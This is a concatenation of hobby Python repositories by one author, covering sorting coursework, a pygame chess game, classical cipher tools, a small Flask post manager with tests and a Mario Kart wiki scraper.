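A short sketch of the five-deep circular undo stack in action: pushing a sixth item overwrites the oldest entry, and removals come back newest-first.
```python
s = MyStack()
for move in ["m1", "m2", "m3", "m4", "m5", "m6"]:
    s.add(move)
print(s.remove())  # m6 (most recent)
print(s.remove())  # m5
```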
#### File: Backgammon/Coursework/merge_sort.py
```python
def merge(a,b,ob):
merged = []
while len(a) != 0 and len(b) != 0:
        if a[0][ob] <= b[0][ob]:
merged.append(a.pop(0))
elif a[0][ob] > b[0][ob]:
merged.append(b.pop(0))
if len(a) !=0 and len(b) == 0:
merged += a
elif len(a) == 0 and len(b) != 0:
merged += b
return merged
def mergesort(array,order_by):
if len(array) == 0 or len(array) == 1:
return array
else:
middle = int(len(array)/2)
a = mergesort(array[:middle],order_by)
b = mergesort(array[middle:],order_by)
return merge(a,b,order_by)
```
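Usage sketch: sorting a list of records by a chosen field index (the records here are invented).
```python
scores = [["alice", 3, 120], ["bob", 1, 95], ["carol", 2, 140]]
print(mergesort(scores, 2))
# [['bob', 1, 95], ['alice', 3, 120], ['carol', 2, 140]]
```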
#### File: Backgammon/Coursework/radix_sort.py
```python
def getDig(n,modder,dig_array,maxLength,num):
dig = n % modder
actual_dig = int(dig / (modder/10))
modder *= 10
new_n = n - dig
dig_array.append(actual_dig)
if new_n == 0 and len(dig_array) == maxLength:
num[2] = dig_array
return num
return getDig(new_n,modder,dig_array,maxLength,num)
def fillBuckets(n,digits_array,radix_buckets):
for i in range(len(digits_array)):
radix_buckets[digits_array[i][2][n]].append(digits_array[i])
new_digits_array = []
for bucket in radix_buckets:
while len(bucket) != 0:
new_digits_array.append(bucket.pop(0))
return new_digits_array
def magic(numList):
sorted_list = []
for nums in numList:
s = ''.join(map(str, nums[2][::-1]))
nums[2] = s
sorted_list.append(nums)
return sorted_list
def radix(array):
radix_buckets = [[] for i in range(10)]
digits_array = []
ints_array = []
for i in array:
ints_array.append(i[2])
maxInt = 0
for i in ints_array:
if int(i) > maxInt:
maxInt = int(i)
maxInt = len(str(maxInt))
for num in array:
digits_array.append(getDig(int(num[2]),10,[],maxInt,num))
for i in range(maxInt):
digits_array = fillBuckets(i,digits_array,radix_buckets)
return magic(digits_array)
``` |
{
"source": "jj-style/Chess",
"score": 3
} |
#### File: jj-style/Chess/chess.py
```python
import pygame_setup as pg
import pygame, os, time, tkinter
import tkinter.messagebox
WHITE = (255,255,255)
BLACK = (0,0,0)
RED = (255,0,0)
GREEN = (0,255,0)
BLUE = (0,0,255)
BOARDBROWN = (117,57,4)
BOARDWHITE = (255,228,196)
current_directory = os.getcwd()
class BoardCell():
def __init__(self):
self.Color = None
self.ContainedPiece = None
self.X = 0
self.Y = 0
self.Width = 50
self.Height = 50
def SetX(self,x):
self.X = x
def SetY(self,y):
self.Y = y
def GetWidth(self):
return self.Width
def GetHeight(self):
return self.Height
def GetX(self):
return self.X
def GetY(self):
return self.Y
def SetColor(self,color):
self.Color = color
def ShowCell(self):
return pygame.draw.rect(app.getScreen(),self.Color,(self.X,self.Y,self.Width,self.Height),0)
def SetContainedPiece(self,ChessPiece):
self.ContainedPiece = ChessPiece
def GetContainedPiece(self):
return self.ContainedPiece
def ShowContainedPiece(self):
if self.ContainedPiece != None:
self.ContainedPiece.ShowPiece(self.X,self.Y)
class Piece():
def __init__(self,color):
self.Color = color
self.PieceImage = pygame.image.load("{}//Images//{}.png".format(current_directory,self.Name+self.Color))
self.PieceImage = pygame.transform.scale(self.PieceImage,(45,45))
def ShowPiece(self,x,y):
app.getScreen().blit(self.PieceImage,(x,y))
def GetName(self):
return self.Name
def GetColor(self):
return self.Color
class Pawn(Piece):
def __init__(self,color,moved=False):
self.Name = "Pawn"
self.HasBeenMoved = moved
Piece.__init__(self,color)
def SetHasBeenMoved(self):
self.HasBeenMoved = True
def GetHasBeenMoved(self):
return self.HasBeenMoved
def GetDestinations(self,PlayerTurn,CurrentCell):
x,y = GetIndexFromCell(CurrentCell)
ValidMoves = []
#Moves - [YOffset,XOffset]
BlackClearMoves = [[-1,0]]
WhiteClearMoves = [[1,0]]
if self.HasBeenMoved == False:
BlackClearMoves.append([-2,0])
WhiteClearMoves.append([2,0])
if PlayerTurn == "Black":
for PotentialMove in BlackClearMoves:
try:
if x+PotentialMove[0] >=0 and y+PotentialMove[1] >=0:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
elif PlayerTurn == "White":
for PotentialMove in WhiteClearMoves:
try:
if x+PotentialMove[0] >=0 and y+PotentialMove[1] >=0:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
BlackTakeMoves = [[-1,-1],[-1,1]]
WhiteTakeMoves = [[1,-1],[1,1]]
if PlayerTurn == "Black":
for PotentialMove in BlackTakeMoves:
try:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() != None:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
elif PlayerTurn == "White":
for PotentialMove in WhiteTakeMoves:
try:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece() != None:
if Board[x+PotentialMove[0]][y+PotentialMove[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+PotentialMove[0]][y+PotentialMove[1]])
except:
pass
return ValidMoves
class Rook(Piece):
def __init__(self,color):
self.Name = "Rook"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[0,1],[1,0],[0,-1],[-1,0]]
for Stagger in Staggers:
NextSquare = True
TempCurrentCell = CurrentCell
while NextSquare == True:
x,y = GetIndexFromCell(TempCurrentCell)
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
TempCurrentCell = Board[x+Stagger[0]][y+Stagger[1]]
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
NextSquare = False
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
NextSquare = False
except:
NextSquare = False
else:
NextSquare = False
return ValidMoves
class Knight(Piece):
def __init__(self,color):
self.Name = "Knight"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[2,1],[2,-1],[-2,1],[-2,-1],[1,2],[1,-2],[-1,2],[-1,-2]]
x,y = GetIndexFromCell(CurrentCell)
for Stagger in Staggers:
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
pass
except:
pass
else:
pass
return ValidMoves
class Bishop(Piece):
def __init__(self,color):
self.Name = "Bishop"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[1,1],[1,-1],[-1,-1],[-1,1]]
for Stagger in Staggers:
NextSquare = True
TempCurrentCell = CurrentCell
while NextSquare == True:
x,y = GetIndexFromCell(TempCurrentCell)
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
TempCurrentCell = Board[x+Stagger[0]][y+Stagger[1]]
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
NextSquare = False
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
NextSquare = False
except:
NextSquare = False
else:
NextSquare = False
return ValidMoves
class King(Piece):
def __init__(self,color,moved=False):
self.Name = "King"
self.HasBeenMoved = moved
Piece.__init__(self,color)
def SetHasBeenMoved(self):
self.HasBeenMoved = True
def GetHasBeenMoved(self):
return self.HasBeenMoved
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[1,1],[1,-1],[-1,-1],[-1,1],[0,1],[1,0],[0,-1],[-1,0]]
x,y = GetIndexFromCell(CurrentCell)
for Stagger in Staggers:
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
pass
except:
pass
else:
pass
y,x = GetIndexFromCell(CurrentCell)
if self.HasBeenMoved == False:
if Board[y][0].GetContainedPiece() != None:
if Board[y][0].GetContainedPiece().GetName() == "Rook":
ClearLeft = True
for i in range(1,x):
if Board[y][i].GetContainedPiece() != None:
ClearLeft = False
break
if ClearLeft == True:
ValidMoves.append(Board[y][x-2])
if Board[y][7].GetContainedPiece() != None:
if Board[y][7].GetContainedPiece().GetName() == "Rook":
ClearRight = True
for i in range(x+1,7):
if Board[y][i].GetContainedPiece() != None:
ClearRight = False
break
if ClearRight == True:
ValidMoves.append(Board[y][x+2])
return ValidMoves
class Queen(Piece):
def __init__(self,color):
self.Name = "Queen"
Piece.__init__(self,color)
def GetDestinations(self,PlayerTurn,CurrentCell):
ValidMoves = []
Staggers = [[1,1],[1,-1],[-1,-1],[-1,1],[0,1],[1,0],[0,-1],[-1,0]]
for Stagger in Staggers:
NextSquare = True
TempCurrentCell = CurrentCell
while NextSquare == True:
x,y = GetIndexFromCell(TempCurrentCell)
if x+Stagger[0] >=0 and y+Stagger[1] >=0:
try:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() == None:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
TempCurrentCell = Board[x+Stagger[0]][y+Stagger[1]]
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece() != None:
if Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() != PlayerTurn:
ValidMoves.append(Board[x+Stagger[0]][y+Stagger[1]])
NextSquare = False
elif Board[x+Stagger[0]][y+Stagger[1]].GetContainedPiece().GetColor() == PlayerTurn:
NextSquare = False
except:
NextSquare = False
else:
NextSquare = False
return ValidMoves
class PlayerClass():
def __init__(self,PlayerColor):
self.PlayerColor = PlayerColor
self.TimePlayed = 0
self.InCheck = False
def GetPlayerColor(self):
return self.PlayerColor
def SetInCheck(self,NewStatus):
self.InCheck = NewStatus
def GetInCheck(self):
return self.InCheck
def IsInCheck(self):
if self.PlayerColor == "Black":
OtherPlayerColor = "White"
else:
OtherPlayerColor = "Black"
for i in range(8):
for j in range(8):
Piece = Board[i][j].GetContainedPiece()
if Piece != None:
if Piece.GetColor() != self.PlayerColor:# and Piece.GetName() != "King":
Destinations = Piece.GetDestinations(OtherPlayerColor,Board[i][j])
for Dest in Destinations:
if Dest.GetContainedPiece() != None:
if Dest.GetContainedPiece().GetName() == "King":
if Dest.GetContainedPiece().GetColor() == self.PlayerColor:
return True
return False
class GameClass():
def __init__(self):
self.Turn = "White"
def SwitchTurn(self):
if self.Turn == "White":
self.Turn = "Black"
else:
self.Turn = "White"
def GetTurn(self):
return self.Turn
#__________________________________#
def SetBoard():
Count = 0
for i in range(8):
for j in range(8):
if Count%2 == 0:
if i%2==0:
Board[i][j].SetColor(BOARDWHITE)
else:
Board[i][j].SetColor(BOARDBROWN)
else:
if i%2 == 0:
Board[i][j].SetColor(BOARDBROWN)
else:
Board[i][j].SetColor(BOARDWHITE)
Board[i][j].SetX(Count*Board[i][j].GetWidth())
Board[i][j].SetY(i*Board[i][j].GetHeight())
Count = (Count + 1) % 8
def SetPieces(filename):
LoadBoard = []
File = open(filename,'r')
for Row in File.readlines():
LoadBoard.append(Row.strip().split(','))
File.close()
for i in range(8):
for k in range(8):
if LoadBoard[i][k] != 'XX':
Piece = LoadBoard[i][k]
Color = GetColor(Piece[1])
if Piece[0] == "P":
Board[i][k].SetContainedPiece(Pawn(Color))
elif Piece[0] == "p":
Board[i][k].SetContainedPiece(Pawn(Color,True))
elif Piece[0] == "R":
Board[i][k].SetContainedPiece(Rook(Color))
elif Piece[0] == "N":
Board[i][k].SetContainedPiece(Knight(Color))
elif Piece[0] == "B":
Board[i][k].SetContainedPiece(Bishop(Color))
elif Piece[0] == "K":
Board[i][k].SetContainedPiece(King(Color))
elif Piece[0] == "k":
Board[i][k].SetContainedPiece(King(Color,True))
elif Piece[0] == "Q":
Board[i][k].SetContainedPiece(Queen(Color))
if LoadBoard[-1][0] == "Black":
Game.SwitchTurn()
def GetColor(Color):
if Color == "W":
return "White"
else:
return "Black"
def AskSave():
root = tkinter.Tk()
root.withdraw()
response = tkinter.messagebox.askyesno("Warning","Would you like to save your game?")
root.update()
return response
def SaveGame():
print("saving game...")
SaveBoard = []
for i in range(8):
Row = []
for j in range(8):
try:
ChessPiece = Board[i][j].GetContainedPiece().GetName()
PieceColor = Board[i][j].GetContainedPiece().GetColor()
if ChessPiece == "King" or ChessPiece == "Pawn":
if Board[i][j].GetContainedPiece().GetHasBeenMoved() == True:
ChessPiece = ChessPiece.lower()
except:
ChessPiece, PieceColor = "X", "X"
finally:
Row.append(ChessPiece[0] + PieceColor[0])
SaveBoard.append(','.join(Row))
File = open("save_game.txt","w")
for Row in SaveBoard:
File.write("".join(Row)+"\n")
File.write(Game.GetTurn())
File.close()
def ShowBoard():
for i in range(8):
for j in range(8):
Board[i][j].ShowCell()
def ShowPieces():
for i in range(8):
for j in range(8):
if Board[i][j].GetContainedPiece() != None:
Board[i][j].ShowContainedPiece()
def GetIndexFromCell(Cell):
for i in range(8):
for j in range(8):
if Board[i][j] == Cell:
return i,j
#__________________________________#
def Turn(Player):
CanMove = GetCanMove(Player.GetPlayerColor())
if not CanMove:
return
if Player.IsInCheck() == True:
CheckMate = InCheckMate(Player,Player.GetPlayerColor())
if CheckMate:
print("Check mate")
return "Game Over"
else:
Render(Check=True)
print("Check")
ValidPiece = False
while not ValidPiece:
PieceCell = SelectPiece()
Piece = PieceCell.GetContainedPiece()
if Piece.GetColor() == Player.GetPlayerColor():
ValidPiece = True
ValidMoves = Piece.GetDestinations(Player.GetPlayerColor(),PieceCell)
ValidMoves = FilterUnCheckMoves(PieceCell,ValidMoves,Player)
if len(ValidMoves) == 0:
print("No valid moves for that piece")
return Turn(Player)
else:
Render(True,ValidMoves,Check=Player.IsInCheck())
ValidDest = False
DestCell = SelectDest()
if DestCell not in ValidMoves:
Render(Check=Player.IsInCheck())
return Turn(Player)
else:
if Piece.GetName() == "Pawn" or Piece.GetName() == "King":
Piece.SetHasBeenMoved()
if Piece.GetName() == "King":
SY, SX = GetIndexFromCell(PieceCell)
DY, DX = GetIndexFromCell(DestCell)
if abs(SX-DX) != 1 and SY-DY == 0:
CastleSwap(PieceCell,DestCell)
else:
Move(PieceCell,DestCell)
else:
Move(PieceCell,DestCell)
def SelectPiece():
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
SaveGameResponse = AskSave()
if SaveGameResponse == True:
SaveGame()
app.exit()
elif event.type == pygame.MOUSEBUTTONDOWN:
mx, my = pygame.mouse.get_pos()
for i in range(8):
for j in range(8):
Cell = Board[i][j]
if Cell.ShowCell().collidepoint(mx,my):
if Cell.GetContainedPiece() != None:
print(Cell.GetContainedPiece().GetName())
return Cell
def SelectDest():
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
SaveGameResponse = AskSave()
if SaveGameResponse == True:
SaveGame()
app.exit()
elif event.type == pygame.MOUSEBUTTONDOWN:
mx, my = pygame.mouse.get_pos()
for i in range(8):
for j in range(8):
Cell = Board[i][j]
if Cell.ShowCell().collidepoint(mx,my):
return Cell
def Move(Source,Dest):
Dest.SetContainedPiece(Source.GetContainedPiece())
Source.SetContainedPiece(None)
def CastleSwap(SourceKing,Dest):
DY, DX = GetIndexFromCell(Dest)
KY, KX = GetIndexFromCell(SourceKing)
if DX < KX:
SourceCastle = Board[KY][0]
else:
SourceCastle = Board[KY][7]
CY, CX = GetIndexFromCell(SourceCastle)
if abs(KX-CX) == 4:
Board[KY][KX+2].SetContainedPiece(SourceKing.GetContainedPiece())
Board[CY][CX-3].SetContainedPiece(SourceCastle.GetContainedPiece())
else:
Board[KY][KX-2].SetContainedPiece(SourceKing.GetContainedPiece())
Board[CY][CX+2].SetContainedPiece(SourceCastle.GetContainedPiece())
SourceKing.SetContainedPiece(None)
SourceCastle.SetContainedPiece(None)
def GetCanMove(PlayerTurn):
for i in range(8):
for j in range(8):
Piece = Board[i][j].GetContainedPiece()
if Piece != None:
if Piece.GetColor() == PlayerTurn:
ValidMoves = Piece.GetDestinations(PlayerTurn,Board[i][j])
if len(ValidMoves) > 0:
return True
return False
def InCheckMate(Player,PlayerTurn):
for i in range(8):
for j in range(8):
Piece = Board[i][j].GetContainedPiece()
if Piece != None:
#if Piece.GetName() == "King":
if Piece.GetColor() == PlayerTurn:
ValidMoves = Piece.GetDestinations(PlayerTurn,Board[i][j])
ValidMoves = FilterUnCheckMoves(Board[i][j],ValidMoves,Player)
if len(ValidMoves) != 0:
return False
return True
def FilterUnCheckMoves(Source,ValidMoves,Player):
NewValidMoves = []
for Dest in ValidMoves:
TempTaken = None
if Dest.GetContainedPiece() != None:
TempTaken = Dest.GetContainedPiece()
Move(Source,Dest)
if Player.IsInCheck() == False:
NewValidMoves.append(Dest)
Move(Dest,Source)
if TempTaken != None:
Dest.SetContainedPiece(TempTaken)
return NewValidMoves
#__________________________________#
def Render(ShowValidDests=False,ValidDests=[],Check=False,Checkmate=False):
app.getScreen().fill(WHITE)
ShowBoard()
ShowPieces()
if ShowValidDests == True:
for Cell in ValidDests:
pygame.draw.circle(app.getScreen(),GREEN,(Cell.GetX()+(Cell.GetWidth()//2),Cell.GetY()+(Cell.GetHeight()//2)),5)
if Game.GetTurn() == "White":
PlayerOneColor = GREEN
PlayerTwoColor = BLACK
elif Game.GetTurn() == "Black":
PlayerOneColor = BLACK
PlayerTwoColor = GREEN
pg.renderText("White",20,PlayerOneColor,25,app.getHeight()-35,app.getScreen())
pg.renderText("Black",20,PlayerTwoColor,app.getWidth()-75,app.getHeight()-35,app.getScreen())
if Check == True and Checkmate == False:
pg.renderText("Check",20,RED,(app.getWidth()//2)-50,app.getHeight()-35,app.getScreen())
elif Checkmate == True:
pg.renderText("Checkmate",20,RED,(app.getWidth()//2)-75,app.getHeight()-35,app.getScreen())
pygame.display.update()
app.Tick()
def Events():
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exit()
def MenuRender():
app.getScreen().fill(WHITE)
pg.renderText("Chess",50,BLACK,(app.getWidth()//2)-70,35,app.getScreen())
New = pg.renderText("New game",30,BLACK,(app.getWidth()//2)-150,(app.getHeight()//2),app.getScreen())
Load = pg.renderText("Load game",30,BLACK,(app.getWidth()//2)+20,(app.getHeight()//2),app.getScreen())
pygame.display.update()
return New, Load
def Menu():
while True:
New, Load = MenuRender()
for event in pygame.event.get():
if event.type == pygame.QUIT:
app.exit()
elif event.type == pygame.MOUSEBUTTONDOWN:
mx, my = pygame.mouse.get_pos()
if New.collidepoint(mx,my):
return "NEW"
elif Load.collidepoint(mx,my):
return "LOAD"
def Main():
app.begin()
GameMode = Menu()
SetBoard()
if GameMode == "NEW":
SetPieces('default.txt')
elif GameMode == "LOAD":
SetPieces('save_game.txt')
GameOver = False
while not GameOver:
Render()
if Game.GetTurn() == "White":
Status = Turn(PlayerOne)
else:
Status = Turn(PlayerTwo)
if Status == "Game Over":
GameOver = True
Game.SwitchTurn()
while True:
Render(Check=True,Checkmate=True)
Events()
if __name__ == "__main__":
app = pg.App(400,450,16,"Chess")
Board = [[BoardCell() for i in range(8)] for dimensions in range(8)]
Game = GameClass()
PlayerOne = PlayerClass("White")
PlayerTwo = PlayerClass("Black")
Main()
``` |
{
"source": "jj-style/Cryptobreaker",
"score": 3
} |
#### File: Cryptobreaker/Source/Autokey.py
```python
from Vigenere import *
from RemovePunctuation import *
import string
alphabet = string.ascii_lowercase
def AutokeyEncode(plaintext,key):
key = key + plaintext
return VigenereEncode(plaintext,key)
def AutokeyDecode(ciphertext,key):
key = list(key)
plaintext = ""
for i in range(len(ciphertext)):
if ciphertext[i] in alphabet:
current_key = key.pop(0)
plaintext_letter = VigenereDecode(ciphertext[i],current_key)
key.append(plaintext_letter)
else:
plaintext_letter = ciphertext[i]
plaintext += plaintext_letter
return plaintext
```
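A round-trip sketch, assuming the sibling `Vigenere` module imported above implements the standard tabula recta.
```python
ciphertext = AutokeyEncode("attackatdawn", "queen")
print(AutokeyDecode(ciphertext, "queen"))  # attackatdawn
```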
#### File: Cryptobreaker/Source/Beaufort.py
```python
import string
from RemovePunctuation import *
alphabet = list(string.ascii_lowercase)
def BeaufortEncode(text,key,german=False):
ciphertext = ""
text_count = 0
key_count = 0
while text_count < len(text):
if text[text_count] in alphabet:
if not german:
ciphertext += alphabet[(alphabet.index(key[key_count%len(key)]) - alphabet.index(text[text_count])) % len(alphabet)]
elif german:
ciphertext += alphabet[(alphabet.index(text[text_count]) - alphabet.index(key[key_count%len(key)])) % len(alphabet)]
text_count += 1
key_count += 1
else:
ciphertext += text[text_count]
text_count += 1
return ciphertext
def BeaufortDecode(text,key,german=False):
plaintext = ""
text_count = 0
key_count = 0
while text_count < len(text):
if text[text_count] in alphabet:
if not german:
plaintext += alphabet[(alphabet.index(key[key_count%len(key)]) - alphabet.index(text[text_count])) % len(alphabet)]
elif german:
plaintext += alphabet[(alphabet.index(text[text_count]) + alphabet.index(key[key_count%len(key)])) % len(alphabet)]
text_count += 1
key_count += 1
else:
plaintext += text[text_count]
text_count += 1
return plaintext
```
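Note that the classic (non-German) Beaufort cipher is an involution, which is why the encode and decode branches above share the same `key - text` formula; applying the keyed transform twice recovers the plaintext.
```python
ciphertext = BeaufortEncode("attackatdawn", "fortify")
print(BeaufortDecode(ciphertext, "fortify"))  # attackatdawn
```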
#### File: Cryptobreaker/Source/FrequencyAnalysis.py
```python
import string
alphabet = list(string.ascii_lowercase)
def FrequencyAnalysis(text):
analysis = []
for letter in alphabet:
analysis.append([letter,0])
for letter in text:
if letter in alphabet:
analysis[alphabet.index(letter)][1] += 1
return analysis
def LetterFrequencyAnalysis(text):
    # English letters in typical descending frequency order, kept for reference
    most_common = 'etaoinshrdlcumwfgypbvkjxqz'
letter_freq = {}
for letter in text:
if letter in alphabet:
if letter not in letter_freq:
letter_freq[letter] = 1
else:
letter_freq[letter] += 1
for letter in alphabet:
if letter not in letter_freq:
letter_freq[letter] = 0
sorted_letter_freq = sorted(letter_freq.items(), key=lambda x: x[1],reverse=True)
return sorted_letter_freq
```
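A quick illustration on a short string; `sorted` is stable, so letters with equal counts keep their insertion order and only the counts are meaningful.
```python
print(LetterFrequencyAnalysis("hello world")[:3])
# [('l', 3), ('o', 2), ('h', 1)]
```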
#### File: Cryptobreaker/Source/RemovePunctuation.py
```python
import string
punctuation = string.punctuation + "’" + '“' + "‘" + "—"
def RemovePunctuation(text,remove_spaces=True,to_lower=True):
text = list(text)
while "\n" in text:
text.remove("\n")
text = "".join(text)
if remove_spaces:
text = text.replace(" ","")
if to_lower:
text=text.lower()
for letter in text:
if letter in punctuation:
text = text.replace(letter,"")
text = text.strip("\n")
return text
``` |
{
"source": "jj-style/FlaskReactTemplateApp",
"score": 3
} |
#### File: facades/post/naiive_post_manager.py
```python
from .post_manager import PostManager
from app.data import post_response, posts_response, new_post_request
class NaiivePostManager(PostManager):
def __init__(self):
self.posts = []
def list_posts(self):
return posts_response.dump(self.posts)
def get_post_by_id(self, id):
p = next((p for p in self.posts if p["id"] == id), None)
if not p:
return "Not Found", 404
else:
return post_response.dump(p)
def create_post(self, req):
post = new_post_request.load(req)
        ids = [p["id"] for p in self.posts]  # posts are stored as plain dicts
if len(ids) == 0:
ids = [-1]
new_post = {
**post,
**{"id": max(ids) + 1, "slug": post["title"].replace(" ", "-").lower()},
}
self.posts.append(new_post)
return new_post, 201
def get_post_by_slug(self, slug: str):
p = next((p for p in self.posts if p.get("slug", "") == slug), None)
if not p:
return "Not Found", 404
else:
return post_response.dump(p)
```
#### File: facades/post/test_post_manager.py
```python
import pytest
from .post_factory import PostFactory
from .post_manager import PostManager
@pytest.fixture(scope="module")
def naiive_post_manager() -> PostManager:
f = (PostFactory()).set_type("NAIIVE")
return f.new()
def test_list_no_posts_happy(naiive_post_manager: PostManager):
res = naiive_post_manager.list_posts()
assert type(res) == list
assert len(res) == 0
def test_get_post_by_id_404(naiive_post_manager: PostManager):
res = naiive_post_manager.get_post_by_id("randomid_that_doesnt_exist")
assert 404 in res
def test_create_post(naiive_post_manager: PostManager):
res = naiive_post_manager.create_post({"title": "my post", "body": "body of post"})
assert 201 in res
def test_get_by_id(naiive_post_manager: PostManager):
res = naiive_post_manager.get_post_by_id(0)
assert type(res) == dict
assert res.get("title") == "my post"
assert res.get("body") == "body of post"
def test_get_by_slug(naiive_post_manager: PostManager):
res = naiive_post_manager.get_post_by_slug("my-post")
assert type(res) == dict
assert res.get("title") == "my post"
assert res.get("body") == "body of post"
``` |
{
"source": "jj-style/MarioKartCharVecComp",
"score": 3
} |
#### File: jj-style/MarioKartCharVecComp/mario_kart.py
```python
import requests
import bs4 as bs
def get_content_from_url(url):
r = requests.get(url)
soup = bs.BeautifulSoup(r.content,'lxml')
return soup
def get_character_bonuses(soup):
tables = soup.find_all("table",class_="wikitable")
for table in tables:
header = table.find("tr")
if header.get_text().strip() == "Character Bonuses":
break
rows = table.find_all("tr")
rows.pop(0)
headings_temp = rows.pop(0).find_all("th")
data = []
headings = []
for h in headings_temp:
headings.append(h.get_text().strip())
data.append(headings)
sizes = get_character_sizes(soup)
small = []
medium = []
large = []
for row in rows:
name = row.find("th").get_text().strip()
stats = [x.get_text().strip() for x in row.find_all("td")]
for i in range(len(stats)):
if stats[i] == '-':
stats[i] = '0'
stats = list(map(int,stats))
if name in sizes["S"]:
small.append([name] + stats)
elif name in sizes["M"]:
medium.append([name] + stats)
elif name in sizes["L"]:
large.append([name] + stats)
data.append(small)
data.append(medium)
data.append(large)
return data
def get_character_sizes(soup):
gal_text = soup.find_all("div", class_="gallerytext")
sizes = {"S":[],"M":[],"L":[]}
for t in gal_text:
name = t.find("a").get_text()
if "Small" in t.get_text():
sizes["S"].append(name)
elif "Medium" in t.get_text():
sizes["M"].append(name)
elif "Large" in t.get_text():
sizes["L"].append(name)
return sizes
def get_vehicle_stats(soup):
tables = soup.find_all("table",class_="wikitable")
for table in tables:
header = table.find("tr")
if header.get_text().strip() == "Vehicle Stats":
break
rows = table.find_all("tr")
rows.pop(0)
headings_temp = rows.pop(0).find_all("th")
headings = []
data = []
for h in headings_temp:
headings.append(h.get_text().strip())
data.append(headings[:8])
small = []
medium = []
large = []
current_heading = headings[0]
for row in rows:
row_data = row.find_all("td")
if row_data != []:
row_data[0] = row_data[0].get_text().strip()
for i in range(1,8):
datum = row_data[i].get_text()
if datum == "-":
row_data[i] = 0
else:
row_data[i] = int(datum)
if "Small" in current_heading:
small.append(row_data[:8])
elif "Medium" in current_heading:
medium.append(row_data[:8])
elif "Large" in current_heading:
large.append(row_data[:8])
else:
current_heading = (row.find("th").get_text())
data.append(small)
data.append(medium)
data.append(large)
return data
def all_char_vec_combos(c,v):
cross_join = []
for j in range(3):
characters = c[j]
vehicles = v[j]
for char in characters:
for vehic in vehicles:
cross = []
cross.append(char[0] + " in " + vehic[0])
for i in range(1,len(char)):
cross.append(char[i] + vehic[i])
cross_join.append(cross)
return cross_join
def get_data():
mario_kart_wiki_url = "https://www.mariowiki.com/Mario_Kart_Wii"
soup = get_content_from_url(mario_kart_wiki_url)
char_bonuses = get_character_bonuses(soup)
headings = (char_bonuses[0])
headings[0] += ",Vehicle"
v_stats = get_vehicle_stats(soup)
c = all_char_vec_combos(char_bonuses[1:], v_stats[1:])
#drift_sorted = sorted(c,key=lambda x: (x[headings.index("Drift")], x[headings.index("Mini-Turbo")], x[headings.index("Speed")]),reverse=True)
return headings, c
``` |
{
"source": "jj-style/Pong",
"score": 4
} |
#### File: jj-style/Pong/pygame_setup.py
```python
import pygame
from tkinter import *
import tkinter.messagebox
#App class for pygame window
class App():
#Pass width, height, tickspeed and caption of window to constructor
def __init__(self,width,height,tickSpeed,caption):
self.screenx = width
self.screeny = height
self.tickSpeed = tickSpeed
self.caption = caption
self.screen = None
self.clock = None
#Call begin to actually initialise pygame and set the display and clock etc.
def begin(self):
pygame.init()
pygame.mixer.quit()
pygame.display.set_caption(self.caption)
self.screen = pygame.display.set_mode((self.screenx, self.screeny))
self.clock = pygame.time.Clock()
#Exit pygame and python
def exit(self):
pygame.quit()
quit()
